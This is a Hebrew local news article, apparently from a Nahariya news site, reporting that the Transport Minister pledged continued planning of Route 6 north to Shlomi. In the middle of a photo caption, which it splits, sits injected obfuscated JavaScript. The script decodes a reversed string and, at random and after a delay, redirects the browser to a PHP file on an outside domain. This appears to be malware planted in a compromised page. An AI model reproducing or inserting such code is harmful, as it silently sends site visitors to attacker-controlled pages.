fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

בשורה משמחת: שרת התחבורה הודיעה כי תכנון והארכת כביש 6 לצפון יימשכו

שרת התחבורה והבטיחות בדרכים, חברת הכנסת מרב מיכאלי, הודיעה כי המשך תכנון הארכת המקטע הצפוני של כביש 6 עד לשלומי תימשך ולא תבוטל.
השרה מרב מיכאלי עם ראש עיריית נהריה רונן מרלי | צילום: Ritvo photography
השרה מרב מיכאלי עם ראש עיריית נהריה רונן מרלי | צילום: Ritvo pho$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tography

שרת התחבורה והבטיחות בדרכים, חברת הכנסת מרב מיכאלי, הודיעה אתמול (יום שני) במכתב לראש עיריית נהריה, רונן מרלי, כי המשך תכנון הארכת המקטע הצפוני של כביש 6 עד לשלומי תימשך ולא תבוטל. לפני מספר שבועות, התקיים דיון מיוחד בוועדת הכלכלה של הכנסת, בראשות חבר הכנסת מיכאל ביטון. ראש עיריית נהריה, רונן מרלי, שמוביל את נושא קידום המשך תכנונו וסלילתו של כביש 6 לצפון במסגרת אשכול רשויות גליל מערבי והשתתף בדיון, אמר בין השאר, כי "לעצירת העבודות על כביש 6 צפונה, ישנן השלכות חברתיות וכלכליות משמעותיות לגליל בכלל ולגליל המערבי בפרט".

״משרד התחבורה בראשותי, הציב כיעד את צמצום הפער העצום שנגרם עקב השקעת חסר באזור הנגב והגליל", כתבה השרה מיכאלי לראש העיר מרלי במכתבה והוסיפה, כי "תוכנית החומש לכבישים המתגבשת בימים אלו במשרד התחבורה, תיתן דגש משמעותי על השקעה באזורים אלו".

״שרת התחבורה, חברת הכנסת מרב מיכאלי, מבינה את הנחיצות הרבה ועושה מאמצים אדירים לקדם את המשך תכנון וביצוע כביש 6 צפונה עד שלומי וזו בשורה חשובה לעיר נהריה ולכלל יישובי האזור. בשבועות האחרונים אני וחברי ראשי הרשויות באשכול גליל מערבי, פעלנו רבות כדי להסביר עד כמה הפרויקט חשוב וחיוני להמשך פיתוח הגליל ולמען התושבים שבחרו להקים בו את ביתם", אמר ראש עיריית נהריה, רונן מרלי בעקבות המכתב. ״השרה שביקרה בנהריה ביום חמישי מובילה מהלכים חשובים כמו מהפכה במערך התחבורה הציבורית שיצאה לדרך בנהריה ביום שישי האחרון, הרחבת כביש 4, המשך תכנון והארכת כביש 6 לצפון וקידום תוכנית לרשת את העיר נהריה בשבילי אופניים נוספים, לרווחת תושבות ותושבי העיר ועבור המבקרים הרבים המגיעים אליה", הוסיף מרלי.

 

 

לעדכונים נוספים בצפון 1 חדשות נהריה לחצו כאן* לדף הפייסבוק שלנו לחצו כאן*

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות